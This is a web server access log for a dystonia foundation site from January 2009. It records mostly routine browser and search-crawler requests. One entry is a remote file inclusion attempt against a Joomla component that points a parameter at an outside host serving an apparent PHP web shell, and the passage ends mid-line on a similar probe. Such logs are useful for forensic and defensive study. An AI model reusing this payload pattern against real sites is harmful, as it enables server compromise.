65.55.25.139 - - [01/Jan/2009:01:11:11 -0600] "GET /filebin/pdf/Dystonia_Music_Brch_v2_FINAL.pdf HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
98.20.192.245 - - [01/Jan/2009:01:11:25 -0600] "GET /filebin/flash/home.swf HTTP/1.1" 206 241625 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:37 -0600] "GET /pages/what_is_dystonia_/26.php HTTP/1.1" 200 5724 "http://www.dystonia-foundation.org/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:40 -0600] "GET /filebin/js/sifr.js HTTP/1.1" 200 10480 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:44 -0600] "GET /filebin/ajax/js/email_ajax.js HTTP/1.1" 200 13270 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:51 -0600] "GET /filebin/js/prototype.js HTTP/1.1" 200 55149 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:54 -0600] "GET /filebin/css/sIFR.css HTTP/1.1" 200 384 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:54 -0600] "GET /filebin/mightymenu/css/mighty_menu.php HTTP/1.1" 200 614 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:55 -0600] "GET /filebin/mightymenu/script/mighty_menu.js HTTP/1.1" 200 2401 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:55 -0600] "GET /filebin/css/print.css HTTP/1.1" 200 190 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:57 -0600] "GET //filebin/images/nav/on/dystonia_defined.gif HTTP/1.1" 200 568 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:57 -0600] "GET /filebin/images/section_arrow.gif HTTP/1.1" 200 316 "http://www.dystonia-foundation.org/filebin/css/default.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:57 -0600] "GET /filebin/mightymenu/script/page_cookies.php?page_id=26 HTTP/1.1" 200 302 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:59 -0600] "GET /filebin/images/email_btn.gif HTTP/1.1" 200 56 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:59 -0600] "GET /filebin/images/print_btn.gif HTTP/1.1" 200 62 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:13:59 -0600] "GET /filebin/js/replace_text.js HTTP/1.1" 200 188 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:14:00 -0600] "GET /filebin/images/NewContent/shari-and-laurel.jpg HTTP/1.1" 200 33887 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
98.20.192.245 - - [01/Jan/2009:01:14:00 -0600] "GET /filebin/flash/meta_normal.swf HTTP/1.1" 200 9682 "http://www.dystonia-foundation.org/pages/what_is_dystonia_/26.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
88.131.106.1 - - [01/Jan/2009:01:14:45 -0600] "GET /pages/twisted_to_be_broadcast_in_january/266.php HTTP/1.0" 200 497 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
65.55.209.86 - - [01/Jan/2009:01:16:21 -0600] "GET /robots.txt HTTP/1.1" 404 309 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.209.86 - - [01/Jan/2009:01:16:22 -0600] "GET /filebin/ajax/php/?N=A HTTP/1.1" 200 409 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
72.30.65.51 - - [01/Jan/2009:01:17:06 -0600] "GET /pages/people_profile__billy_mclaughlin/function.main HTTP/1.0" 200 497 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
203.114.112.155 - - [01/Jan/2009:01:17:20 -0600] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ofm.pl/poczta/inc/ksela/r57.txt? HTTP/1.1" 404 338 "-" "libwww-perl/5.803"
66.249.71.136 - - [01/Jan/2009:01:17:29 -0600] "GET /pages/teenagers_with_dystonia/210.php HTTP/1.1" 200 4984 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.104.15 - - [01/Jan/2009:01:18:06 -0600] "GET /robots.txt HTTP/1.1" 404 309 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.104.15 - - [01/Jan/2009:01:18:07 -0600] "GET /pages/frequently_asked_questions/98.php HTTP/1.1" 200 4935 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
74.125.75.3 - - [01/Jan/2009:01:18:49 -0600] "GET / HTTP/1.1" 200 4566 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)"
65.55.104.15 - - [01/Jan/2009:01:18:58 -0600] "GET /pages/foundation_news/219.php HTTP/1.1" 200 4528 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
212.34.140.136 - - [01/Jan/2009:01:19:11 -0600] "GET //components/com_pccookbook/pccookbook.php?m